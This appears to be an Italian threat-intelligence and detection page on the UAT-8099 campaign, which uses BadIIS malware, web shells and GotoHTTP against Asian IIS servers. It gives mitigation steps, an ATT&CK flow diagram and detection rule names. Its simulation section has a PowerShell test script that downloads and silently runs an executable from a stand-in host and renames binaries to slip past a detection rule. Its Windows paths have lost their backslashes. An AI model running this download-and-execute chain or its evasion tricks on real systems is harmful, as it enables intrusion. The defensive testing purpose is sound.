Segui
Detection stack
- AIDR
- Alert
- ETL
- Query
Riassunto
Cisco Talos segnala una nuova campagna UAT-8099 che prende di mira i server web IIS vulnerabili in tutta l’Asia. L’attore distribuisce varianti personalizzate di BadIIS che includono identificatori regionali e si affida a web shell, PowerShell e allo strumento di controllo remoto GotoHTTP per il controllo successivo. La persistenza è stata ampliata per includere la creazione di account locali nascosti e l’utilizzo di strumenti legittimi di red-team per mescolarsi alle attività amministrative. La tecnica si sovrappone all’operazione WEBJACK precedente e sembra concentrarsi sulla frode SEO che colpisce i siti in Thailandia e Vietnam.
Indagine
Talos ha esaminato la telemetria DNS, gli hash dei file e gli script nocivi per ricostruire la catena di intrusione. Gli analisti hanno osservato web shell combinate con strumenti come SoftEther VPN e EasyTier, oltre a un set di utility su misura tra cui Sharp4RemoveLog, CnCrypt Protect, OpenArk64 e GotoHTTP. Due ceppi di BadIIS sintonizzati sulla regione — IISHijack e asdSearchEngine — sono stati ingegnerizzati al contrario, rivelando codici paese hard-coded, filtro selettivo delle richieste e configurazione C2 cifrata XOR. È stata identificata anche una build ELF di BadIIS con domini C2 corrispondenti su VirusTotal.
Mitigazione
Patch alle vulnerabilità esposte di IIS, potenziare l’applicazione del firewall dell’applicazione web e monitorare la creazione di account locali nascosti (ad esempio, admin$, mysql$ e simili). Rilevare attività di PowerShell che scaricano o avviano GotoHTTP e bloccare le comunicazioni in uscita verso noti domini C2. Utilizzare controlli degli endpoint per avvisare l’esecuzione delle utility personalizzate identificate e le modifiche inattese all’interno delle directory del server web.
Risposta
Se vengono trovati indicatori, isolare il server, rimuovere le web shell e cancellare gli account nascosti. Conservare i file binari di BadIIS e gli script correlati per l’analisi forense e effettuare una revisione completa del traffico di rete per identificare l’attività C2. Ripristinare da un backup verificato come buono e rinforzare la configurazione di IIS per prevenire una reinfezione.
graph TB %% Class definitions classDef action fill:#99ccff classDef tool fill:#cccccc classDef malware fill:#ffcc99 %% Node definitions action_exploit_public_facing[“<b>Azione</b> – <b>T1190 Sfruttamento di Applicazioni Esposte al Pubblico</b><br/><b>Descrizione</b>: Sfrutta vulnerabilità in applicazioni esposte su Internet per ottenere l’accesso iniziale.<br/><b>Dettagli</b>: Compromessi server IIS tramite vulnerabilità note e distribuzione di web shell.”] class action_exploit_public_facing action tool_web_shell[“<b>Strumento</b> – <b>Nome</b>: Web Shell<br/><b>Descrizione</b>: Script lato server che consente l’esecuzione remota di comandi.”] class tool_web_shell tool action_powershell_execution[“<b>Azione</b> – <b>T1059.001 PowerShell</b><br/><b>Descrizione</b>: Utilizzo di PowerShell per eseguire comandi e payload.<br/><b>Comandi</b>: whoami, tasklist, download di strumenti.”] class action_powershell_execution action tool_powershell[“<b>Strumento</b> – <b>Nome</b>: PowerShell<br/><b>Descrizione</b>: Shell a riga di comando e linguaggio di scripting di Windows.”] class tool_powershell tool action_system_info_discovery[“<b>Azione</b> – <b>T1082 Raccolta di Informazioni di Sistema</b><br/><b>Descrizione</b>: Raccolta della configurazione del sistema operativo e dell’hardware.<br/><b>Comandi</b>: raccolta delle informazioni di sistema, registrazione del contesto utente.”] class action_system_info_discovery action action_create_account[“<b>Azione</b> – <b>T1136 Creazione di Account</b><br/><b>Descrizione</b>: Creazione di account locali nascosti per la persistenza.”] class action_create_account action action_valid_accounts[“<b>Azione</b> – <b>T1078 Account Validi</b><br/><b>Descrizione</b>: Utilizzo degli account creati per accesso persistente ed escalation dei privilegi.”] class action_valid_accounts action action_clear_event_logs[“<b>Azione</b> – <b>T1070.001 Cancellazione dei Log di Eventi di Windows</b><br/><b>Descrizione</b>: Rimozione dei log per nascondere le attività.<br/><b>Strumento</b>: Sharp4RemoveLog.”] class action_clear_event_logs action tool_sharp4removelog[“<b>Strumento</b> – <b>Nome</b>: Sharp4RemoveLog<br/><b>Descrizione</b>: Utilità per cancellare i log degli eventi di Windows.”] class tool_sharp4removelog tool action_disable_event_logging[“<b>Azione</b> – <b>T1562.002 Disabilitazione della Registrazione degli Eventi di Windows</b><br/><b>Descrizione</b>: Compromette le difese disattivando la registrazione degli eventi.”] class action_disable_event_logging action action_obfuscate_files[“<b>Azione</b> – <b>T1027 File o Informazioni Offuscate</b><br/><b>Descrizione</b>: Utilizzo di cifratura XOR (chiave 0x7A) per nascondere la configurazione C2 e i template HTML.”] class action_obfuscate_files action malware_badiis[“<b>Malware</b> – <b>Nome</b>: BadIIS<br/><b>Descrizione</b>: Varianti che impiegano offuscamento XOR.”] class malware_badiis malware action_lateral_tool_transfer[“<b>Azione</b> – <b>T1570 Trasferimento Laterale di Strumenti</b><br/><b>Descrizione</b>: Trasferimento di strumenti e file all’interno dell’ambiente della vittima.<br/><b>Strumenti</b>: binari BadIIS, GotoHTTP, SoftEther VPN, EasyTier.”] class action_lateral_tool_transfer action tool_gotohttp[“<b>Strumento</b> – <b>Nome</b>: GotoHTTP<br/><b>Descrizione</b>: Trasferisce file tramite HTTP/HTTPS.”] class tool_gotohttp tool tool_softether[“<b>Strumento</b> – <b>Nome</b>: SoftEther VPN<br/><b>Descrizione</b>: Proxy multi-hop per l’instradamento del traffico.”] class tool_softether tool tool_easytier[“<b>Strumento</b> – <b>Nome</b>: EasyTier<br/><b>Descrizione</b>: Proxy multi-hop per l’instradamento del traffico.”] class tool_easytier tool action_proxy_multi_hop[“<b>Azione</b> – <b>T1090.003 Proxy Multi-hop</b><br/><b>Descrizione</b>: Utilizzo di strumenti proxy per nascondere l’origine del traffico.”] class action_proxy_multi_hop action action_web_protocol_c2[“<b>Azione</b> – <b>T1071.001 Protocolli Web</b><br/><b>Descrizione</b>: Comunicazione C2 su HTTP/HTTPS utilizzando GotoHTTP.”] class action_web_protocol_c2 action %% Connections showing flow action_exploit_public_facing –>|utilizza| tool_web_shell tool_web_shell –>|abilita| action_powershell_execution action_powershell_execution –>|utilizza| tool_powershell tool_powershell –>|esegue| action_system_info_discovery action_system_info_discovery –>|porta a| action_create_account action_create_account –>|abilita| action_valid_accounts action_valid_accounts –>|utilizza| action_clear_event_logs action_clear_event_logs –>|utilizza| tool_sharp4removelog action_clear_event_logs –>|anche| action_disable_event_logging action_disable_event_logging –>|precede| action_obfuscate_files action_obfuscate_files –>|implementata da| malware_badiis malware_badiis –>|facilita| action_lateral_tool_transfer action_lateral_tool_transfer –>|trasferisce| tool_gotohttp action_lateral_tool_transfer –>|trasferisce| tool_softether action_lateral_tool_transfer –>|trasferisce| tool_easytier tool_softether –>|usato per| action_proxy_multi_hop tool_easytier –>|usato per| action_proxy_multi_hop action_proxy_multi_hop –>|supporta| action_web_protocol_c2 tool_gotohttp –>|usato in| action_web_protocol_c2
Flusso di Attacco
Rilevazioni
Download o Upload tramite Powershell (via cmdline)
Visualizza
File sospetti nel Profilo Utente Pubblico (via file_event)
Visualizza
Possibile Enumerazione di Account o Gruppi (via cmdline)
Visualizza
Rilevare Esecuzione di Comandi PowerShell per Distribuzione GotoHTTP [Windows Powershell]
Visualizza
Rilevazione di Malware BadIIS che prende di mira i server IIS per frode SEO [Webserver]
Visualizza
Esecuzione di Simulazione
Prerequisito: Il Controllo Pre-voo di Telemetria & Baseline deve essere superato.
-
Narrazione dell’Attacco & Comandi:
Un attaccante ha ottenuto un punto d’appoggio iniziale su un server web compromesso. Creano una directory nascosta chiamatabad_iissotto il web root di IIS e rilasciano un binario web shell con nome personalizzatoshell_xyz.exe(evitando la stringa letterale “web shell”). Usando la shell, eseguono lateralmente un payload PowerShell che scarica il binario di GotoHTTP, lo rinomina insvc_update.exe, e lo esegue. Poiché i nomi delle immagini sono offuscati, i controlli della regola originaleImage|containsvengono bypassati, mentre la linea di comando contiene ancora “PowerShell”. -
Script di Test di Regressione: Questo script riproduce i passaggi descritti e genera telemetria simile all’attacco BadIIS senza usare le stringhe esatte che la regola monitora.
# BadIIS simulation – obfuscated version $webRoot = "C:inetpubwwwroot" $payloadDir = Join-Path $webRoot "bad_iis" New-Item -Path $payloadDir -ItemType Directory -Force | Out-Null # Deploy a renamed web‑shell (binary copy of a known benign exe) $shellSrc = "$env:SystemRootSystem32notepad.exe" $shellDst = Join-Path $payloadDir "shell_xyz.exe" Copy-Item -Path $shellSrc -Destination $shellDst -Force # Simulate the web‑shell invoking PowerShell to download GotoHTTP $gotoUrl = "http://malicious.example.com/GotoHTTP.exe" $gotoDst = "C:WindowsTempsvc_update.exe" $psCommand = @" Invoke-WebRequest -Uri '$gotoUrl' -OutFile '$gotoDst'; Start-Process -FilePath '$gotoDst' -WindowStyle Hidden; "@ # Execute the PowerShell payload via the renamed web‑shell (process creation) Start-Process -FilePath $shellDst -ArgumentList "/c powershell.exe -NoProfile -ExecutionPolicy Bypass -Command `$psCommand`" -WindowStyle Hidden Write-Output "BadIIS simulation executed." -
Comandi di Pulizia: Rimuove gli artefatti piantati e ripristina l’ambiente.
# Cleanup BadIIS simulation artifacts $webRoot = "C:inetpubwwwroot" $payloadDir = Join-Path $webRoot "bad_iis" Remove-Item -Path $payloadDir -Recurse -Force -ErrorAction SilentlyContinue $gotoDst = "C:WindowsTempsvc_update.exe" Remove-Item -Path $gotoDst -Force -ErrorAction SilentlyContinue Write-Output "Cleanup completed."